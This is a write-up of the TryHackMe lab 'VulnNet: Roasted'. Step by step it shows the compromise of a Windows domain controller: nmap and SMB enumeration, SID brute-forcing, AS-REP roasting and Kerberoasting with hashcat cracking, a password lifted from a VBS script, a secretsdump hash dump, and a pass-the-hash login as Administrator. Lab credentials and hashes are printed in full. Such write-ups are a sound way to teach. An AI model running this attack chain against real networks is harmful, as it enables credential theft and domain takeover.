TryHackMe - VulnNet: Roasted
Introduction
This is a TryHackMe room which can be found at: VulnNet: Roasted
VulnNet Entertainment quickly deployed another management instance on their very broad network…
Reconnaissance & Scanning
Perform nmap scan to identify open ports and services treating the host as online.
- Command:
nmap -p- -T4 -Pn -v 10.10.232.200
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
geobour98@kali:~$ nmap -p- -T4 -Pn -v 10.10.232.200
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-08 13:51 EET
Initiating Parallel DNS resolution of 1 host. at 13:51
Completed Parallel DNS resolution of 1 host. at 13:51, 0.00s elapsed
Initiating Connect Scan at 13:51
Scanning 10.10.232.200 (10.10.232.200) [65535 ports]
Discovered open port 139/tcp on 10.10.232.200
Discovered open port 135/tcp on 10.10.232.200
Discovered open port 53/tcp on 10.10.232.200
Discovered open port 445/tcp on 10.10.232.200
Discovered open port 49668/tcp on 10.10.232.200
Discovered open port 49699/tcp on 10.10.232.200
Discovered open port 49682/tcp on 10.10.232.200
Discovered open port 5985/tcp on 10.10.232.200
Discovered open port 49670/tcp on 10.10.232.200
Discovered open port 464/tcp on 10.10.232.200
Discovered open port 389/tcp on 10.10.232.200
Discovered open port 636/tcp on 10.10.232.200
Discovered open port 88/tcp on 10.10.232.200
Discovered open port 49665/tcp on 10.10.232.200
Discovered open port 49669/tcp on 10.10.232.200
Discovered open port 3269/tcp on 10.10.232.200
Discovered open port 3268/tcp on 10.10.232.200
Discovered open port 593/tcp on 10.10.232.200
Discovered open port 9389/tcp on 10.10.232.200
Completed Connect Scan at 13:53, 167.54s elapsed (65535 total ports)
Nmap scan report for 10.10.232.200 (10.10.232.200)
Host is up (0.11s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49665/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49682/tcp open unknown
49699/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 167.62 seconds
Perform aggressive nmap scan to enable OS detection, default scripts and version detection on the found ports treating the host as online.
- Command:
sudo nmap -A -sC -Pn -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -v 10.10.232.200
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
geobour98@kali:~$ sudo nmap -A -sC -Pn -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -v 10.10.232.200
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-08 14:01 EET
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:01
Completed Parallel DNS resolution of 1 host. at 14:01, 0.00s elapsed
Initiating SYN Stealth Scan at 14:01
Scanning 10.10.232.200 (10.10.232.200) [13 ports]
Discovered open port 445/tcp on 10.10.232.200
Discovered open port 9389/tcp on 10.10.232.200
Discovered open port 139/tcp on 10.10.232.200
Discovered open port 53/tcp on 10.10.232.200
Discovered open port 135/tcp on 10.10.232.200
Discovered open port 3269/tcp on 10.10.232.200
Discovered open port 636/tcp on 10.10.232.200
Discovered open port 5985/tcp on 10.10.232.200
Discovered open port 3268/tcp on 10.10.232.200
Discovered open port 593/tcp on 10.10.232.200
Discovered open port 464/tcp on 10.10.232.200
Discovered open port 389/tcp on 10.10.232.200
Discovered open port 88/tcp on 10.10.232.200
Completed SYN Stealth Scan at 14:01, 0.23s elapsed (13 total ports)
Initiating Service scan at 14:01
Scanning 13 services on 10.10.232.200 (10.10.232.200)
Completed Service scan at 14:01, 13.56s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against 10.10.232.200 (10.10.232.200)
Retrying OS detection (try #2) against 10.10.232.200 (10.10.232.200)
Initiating Traceroute at 14:01
Completed Traceroute at 14:01, 0.16s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:01
Completed Parallel DNS resolution of 1 host. at 14:01, 0.00s elapsed
NSE: Script scanning 10.10.232.200.
Initiating NSE at 14:01
Completed NSE at 14:02, 40.05s elapsed
Initiating NSE at 14:02
Completed NSE at 14:02, 2.42s elapsed
Initiating NSE at 14:02
Completed NSE at 14:02, 0.00s elapsed
Nmap scan report for 10.10.232.200 (10.10.232.200)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-08 12:01:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-11-08T12:01:35
|_ start_date: N/A
|_clock-skew: -1s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 73.06 ms 10.8.0.1 (10.8.0.1)
2 149.15 ms 10.10.232.200 (10.10.232.200)
NSE: Script Post-scanning.
Initiating NSE at 14:02
Completed NSE at 14:02, 0.00s elapsed
Initiating NSE at 14:02
Completed NSE at 14:02, 0.00s elapsed
Initiating NSE at 14:02
Completed NSE at 14:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.40 seconds
Raw packets sent: 97 (7.976KB) | Rcvd: 41 (2.404KB)
We notice that the Domain is: vulnnet-rst.local.
We can add this domain and its IP in the /etc/hosts file.
We can also try to enumerate the shares and their permissions using smbmap.
- Command:
smbmap -H 10.10.232.200 -u anonymous
1
2
3
4
5
6
7
8
9
10
11
geobour98@kali:~$ smbmap -H 10.10.232.200 -u anonymous
[+] Guest session IP: 10.10.232.200:445 Name: 10.10.232.200
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
After some enumeration on the shares with READ ONLY permissions, we didn’t find anything interesting.
Exploitation
Then, we can use the script lookupsid.py from impacket in order to perform bruteforcing of Windows SID’s to identify users/groups on the remote target.
- Command:
/opt/impacket/examples/lookupsid.py anonymous@10.10.232.200
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
geobour98@kali:~$ /opt/impacket/examples/lookupsid.py anonymous@10.10.232.200
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 10.10.232.200
[*] StringBinding ncacn_np:10.10.232.200[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
We found some usernames, so we can create a wordlist with usernames in order to use it to ASREPRoasting attack.
The wordlist usernames.txt should look like this:
1
2
3
4
5
6
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
Then, we execute the script GetNPUsers.py from impacket in order to perform the ASREPRoasting attack, which is used to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will then be encrypted with the user’s password, which can then be cracked offline.
- Command:
/opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.232.200 -usersfile usernames.txt -no-pass vulnnet-rst.local/
1
2
3
4
5
6
7
8
9
geobour98@kali:~$ /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.232.200 -usersfile usernames.txt -no-pass vulnnet-rst.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:91a27a1253abc7bca67160c568048fd1$1167e38fb3eb84adf9a6748af9139fb43085e118f98bd0997c7ab51d0f8aa163893f1fdc3581e61a8536bc7c87d8799d21e301f821111598369aa5d5adcb398b73e4e1a98b9acd984093080a1d37a16d486596ef4e5063e1a496d6099e6967e0b9ea0407418d65604aee49f2683adc2d786bdc4a348db3c3f0b8596dbfe0ac37a2ecd0af2d7323d152155b610b21bded3d313492a7967ebee48b8f47dba5e1f5e939a2b96b104f0b7dc8f5a2c6b3ed625ace4bbad0ecab95a38787cebdc0a2f1662d7abb7797d1ef78a82807f9159432ec7c976cf5378dd171a22d7d8a76a5aede03ffac4724219391394ea547f204c37ab3f2d89a84
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
We found the hash for the user t-skid, which we put in a file and crack it with hashcat on mode 18200.
- Command:
hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
1
2
geobour98@kali:~$ hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:33a9b2294ab57133e1f428724cafeaee$ad62d6b18dcbd50c7a501b186e65e9fe12fbde18015bd1c4748b2dab89db657461d940b1d1afe024e003ed6ef9d9e6f9d2d3566bfdeeeabece7fad7073239b11d4c8cca7641889e380e6e3d150f99595586090c906280737698476b60d7bc888f1d810adc3a5b69239e16e745c0cd091365736a42baf9e9428dd0fcfd83a6d038d82bcd5a3c87e42f6c277f1a8ed384c555052498a3b478cdad4fb22f2f7685a0b0fd837725ddadcb6640fa46b53502b24f2be59e1e120a872e0de0fd3544590bfb905eb435833339dc28c9adc06b6ec795dedb775db071b479a32aee442460ae2ad1631e7eed0097a539e59f07e6517562e7b7dabb1:tj072889*
So, the cleartext password for t-skid is tj072889*.
Now, we can perform the Kerberoasting attack, which attempts to fetch Service Principal Names that are associated with normal user accounts. A ticket that is encrypted with the user account’s password is returned, which can then be bruteforced offline.
- Command:
/opt/impacket/examples/GetUserSPNs.py vulnnet-rst.local/t-skid:'tj072889*' -dc-ip 10.10.232.200 -request
1
2
3
4
5
6
7
8
9
10
11
geobour98@kali:~$ /opt/impacket/examples/GetUserSPNs.py vulnnet-rst.local/t-skid:'tj072889*' -dc-ip 10.10.232.200 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ------------------ ------------------------------------------------------------- -------------------------- -------------------------- ----------
CIFS/vulnnet-rst.local enterprise-core-vn CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local 2021-03-11 21:45:09.913979 2021-03-14 01:41:17.987528
[-] CCache file is not found. Skipping...
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*$5bc05b5e08a81cb226c6b23272df4e95$7f705c093630a21b08128de6dae88225bba2cae7589aefbf31098f167ed23d1f91dcaa2a6386c770b706278366fb6e02cf533172ea5777f90d1efaaac48f9045fc1fa792e2ca57eaf2d12c6fa86e30c7c2421fc7c98cf5ccc1a131563dd3af338467861ec715476354d49c310588a38b29df8217a99eba6168728b489807e72785850279bd1a51a15caca272cac5285396d0fd13c05f6c889408cacf2171b45af9c438f048c7ac35b89295f447e908d2df8e5f90761cdbb9ddf87c7ffb816ccae03fbc36fb0d6a80569047a4c6cc51a0d1cb7187d7e1288216bfcc94a25a7ac026ae6508207784da01e7c7660f339fe8bb7a88d68be95f5c0331d05cf34c56288c21df9d5e0f6d7b2aa566ba3891855ccaff60e26eda257b251421978119494e6597c493ea4b769f276d156ed729c768f71849c4cb03fb75ca861a0cb7bd226de2c3503a43aaecff8245d3566cc61784d285b3d9e7c051b63ef366ef810fda31e3ead5cd3de68c14ed0447db4b43c2eae2cfa8444335a1a12e8033d0fa4334b52278d1d4189950bb6b23afddec426e8da50d921ff7af781027577a82c36492f1da51375d906e1a7ee820888e516f407ed105eebd1741fba436b2cbc84bf6544c825d6ca6aca61e4bf2ad9828c3607aec0072efbeb674bd4ea39434ec7cc670f1932005703284fddd2a79173ffb44f29fb6cd829a329ccf3e8bdb6ea81a72606b74eee58519dc038ce9403321be7638f6bc2ddd1a6a317bea60bd3dbf897c8250d39c50056be9e1b0c3600f32252bed046c67ba849c55f0642c9b6565597003e77bfa97d3923232061d097e02c64286967b0356e6993800a46b237b14fbd60eb98415ed366cd79ba39c39eee92c6507a173bf4887314f818be716530d7f9ce15f97ed6c9fb01e20b75253abae72cdb316730f56c88652ac2657b764438f8caf7dadb94c78e3cbf4bcfd775436f14b6738b3e631af6e73e89eb0ae7aeee04c0b290c275b21f9cc4fb193fa90374d8bf214ea231b2d6db4c2a2281e1e5ef33070139172576c02542b3a4e58e503b995ea44f0a123da1c4d122ae2381974a0881568d9793e978587b1959925044e1e4d970bedcfe09f71e9837aca764214549ca77d8467113ab367001e4fed7402c5aa989cd9ca9bf4c27219b52c4b2d3a85c7f5d9ca6fa914c847ba7646eef11cd9fd0ee612e5815130f054e76f163d3d0e064e6285759df9e45df44534c05a8e3f8fe2c0925aaf9a689975288b6f6138d5f6b8dc9404767f7a0aa24afce821a0f146acf9b1856e15f0a000b727a47c35073d215e53e781f56d4f6218e43595b6bc70c4f58d4c92a2de03e81faf1fc6954e1dc8b3581dd2f1e5c5b4a091965736c554a3eb692561c24ee1fdcfbcd26a9d1b
We found the hash for the user enterprise-core-vn, which we can put in a file and crack it with hashcat on mode 13100.
- Command:
hashcat -m 13100 -a 0 hash1.txt /usr/share/wordlists/rockyou.txt
1
2
3
4
geobour98@kali:~$ hashcat -m 13100 -a 0 hash1.txt /usr/share/wordlists/rockyou.txt
<snip>
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*$5bc05b5e08a81cb226c6b23272df4e95$7f705c093630a21b08128de6dae88225bba2cae7589aefbf31098f167ed23d1f91dcaa2a6386c770b706278366fb6e02cf533172ea5777f90d1efaaac48f9045fc1fa792e2ca57eaf2d12c6fa86e30c7c2421fc7c98cf5ccc1a131563dd3af338467861ec715476354d49c310588a38b29df8217a99eba6168728b489807e72785850279bd1a51a15caca272cac5285396d0fd13c05f6c889408cacf2171b45af9c438f048c7ac35b89295f447e908d2df8e5f90761cdbb9ddf87c7ffb816ccae03fbc36fb0d6a80569047a4c6cc51a0d1cb7187d7e1288216bfcc94a25a7ac026ae6508207784da01e7c7660f339fe8bb7a88d68be95f5c0331d05cf34c56288c21df9d5e0f6d7b2aa566ba3891855ccaff60e26eda257b251421978119494e6597c493ea4b769f276d156ed729c768f71849c4cb03fb75ca861a0cb7bd226de2c3503a43aaecff8245d3566cc61784d285b3d9e7c051b63ef366ef810fda31e3ead5cd3de68c14ed0447db4b43c2eae2cfa8444335a1a12e8033d0fa4334b52278d1d4189950bb6b23afddec426e8da50d921ff7af781027577a82c36492f1da51375d906e1a7ee820888e516f407ed105eebd1741fba436b2cbc84bf6544c825d6ca6aca61e4bf2ad9828c3607aec0072efbeb674bd4ea39434ec7cc670f1932005703284fddd2a79173ffb44f29fb6cd829a329ccf3e8bdb6ea81a72606b74eee58519dc038ce9403321be7638f6bc2ddd1a6a317bea60bd3dbf897c8250d39c50056be9e1b0c3600f32252bed046c67ba849c55f0642c9b6565597003e77bfa97d3923232061d097e02c64286967b0356e6993800a46b237b14fbd60eb98415ed366cd79ba39c39eee92c6507a173bf4887314f818be716530d7f9ce15f97ed6c9fb01e20b75253abae72cdb316730f56c88652ac2657b764438f8caf7dadb94c78e3cbf4bcfd775436f14b6738b3e631af6e73e89eb0ae7aeee04c0b290c275b21f9cc4fb193fa90374d8bf214ea231b2d6db4c2a2281e1e5ef33070139172576c02542b3a4e58e503b995ea44f0a123da1c4d122ae2381974a0881568d9793e978587b1959925044e1e4d970bedcfe09f71e9837aca764214549ca77d8467113ab367001e4fed7402c5aa989cd9ca9bf4c27219b52c4b2d3a85c7f5d9ca6fa914c847ba7646eef11cd9fd0ee612e5815130f054e76f163d3d0e064e6285759df9e45df44534c05a8e3f8fe2c0925aaf9a689975288b6f6138d5f6b8dc9404767f7a0aa24afce821a0f146acf9b1856e15f0a000b727a47c35073d215e53e781f56d4f6218e43595b6bc70c4f58d4c92a2de03e81faf1fc6954e1dc8b3581dd2f1e5c5b4a091965736c554a3eb692561c24ee1fdcfbcd26a9d1b:ry=ibfkfv,s6h,
<snip>
So, the cleartext password for enterprise-core-vn is ry=ibfkfv,s6h,.
We can login as enterprise-core-vn using evil-winrm and read the user flag.
- Command:
evil-winrm -i 10.10.232.200 -u enterprise-core-vn
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
geobour98@kali:~$ evil-winrm -i 10.10.232.200 -u enterprise-core-vn
Enter Password:
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> type user.txt
[REDACTED]
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop>
Privilege Escalation
Now we can access the NETLOGON share as the user enterprise-core-vn and see an interesting file ResetPassword.vbs, which we can download.
- Command:
smbclient \\\\10.10.232.200\\NETLOGON -U enterprise-core-vn
1
2
3
4
5
6
7
8
9
10
11
12
13
geobour98@kali:~$ smbclient \\\\10.10.232.200\\NETLOGON -U enterprise-core-vn
Password for [WORKGROUP\enterprise-core-vn]:
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> mget *
getting file \ResetPassword.vbs of size 2821 as ResetPassword.vbs (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> exit
geobour98@kali:~$ cat ResetPassword.vbs
<snip>
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
<snip>
So, we found the cleartext password bNdKVkjv3RR9ht of user a-whitehat inside the file ResetPassword.vbs.
Now we can use the script secretsdump.py from impacket in order to to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit.
- Command:
/opt/impacket/examples/secretsdump.py vulnnet-rst.local/a-whitehat:'bNdKVkjv3RR9ht'@10.10.232.200
1
2
3
4
5
6
7
8
9
geobour98@kali:~$ /opt/impacket/examples/secretsdump.py vulnnet-rst.local/a-whitehat:'bNdKVkjv3RR9ht'@10.10.232.200
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
<snip>
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<snip>
Now, we can login with the nthash of the Administrator user using evil-winrm.
- Command:
evil-winrm -i 10.10.232.200 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
geobour98@kali:~$ evil-winrm -i 10.10.232.200 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
vil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
[REDACTED]
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
vulnnet-rst\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Now are the Administrator user and can read the system flag.
Proof of Concept (PoC image): 
This post is licensed under CC BY 4.0 by the author.